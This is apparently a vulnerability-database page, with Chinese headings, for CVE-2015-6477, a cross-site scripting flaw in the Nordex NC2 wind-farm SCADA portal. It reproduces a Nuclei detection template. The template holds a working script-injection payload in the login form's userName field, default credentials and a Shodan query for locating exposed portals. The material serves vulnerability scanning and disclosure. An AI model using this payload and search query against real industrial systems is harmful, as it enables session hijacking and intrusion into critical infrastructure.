CVE-2015-6477: Nordex NC2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Nordex NC2 | POC: 已公开

漏洞描述

Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2015-6477

info:
  name: Nordex NC2 - Cross-Site Scripting
  author: geeknik,daffainfo
  severity: medium
  description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2015/Dec/117
    - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
    - https://nvd.nist.gov/vuln/detail/CVE-2015-6477
    - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-6477
    cwe-id: CWE-79
    epss-score: 0.3875
    epss-percentile: 0.97064
    cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: nordex
    product: nordex_control_2_scada
    shodan-query: http.title:"Nordex Control - Wind Farm Portal"
  tags: cve,cve2015,nordex,nc2,seclists,packetstorm,xss,iot

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&pw=nordex&language=en

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"
          - "var detailParams"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220492b2ac5bbfea8339c81211973e8229dad672d8d51d1c3c39cfd018bf341ae6e02210096bf903a08262e56c91caf45d796e498cda57a4aaf01eb338d9db2d7218bb096:922c64590222798bb761d5b6d8e72950

相关漏洞推荐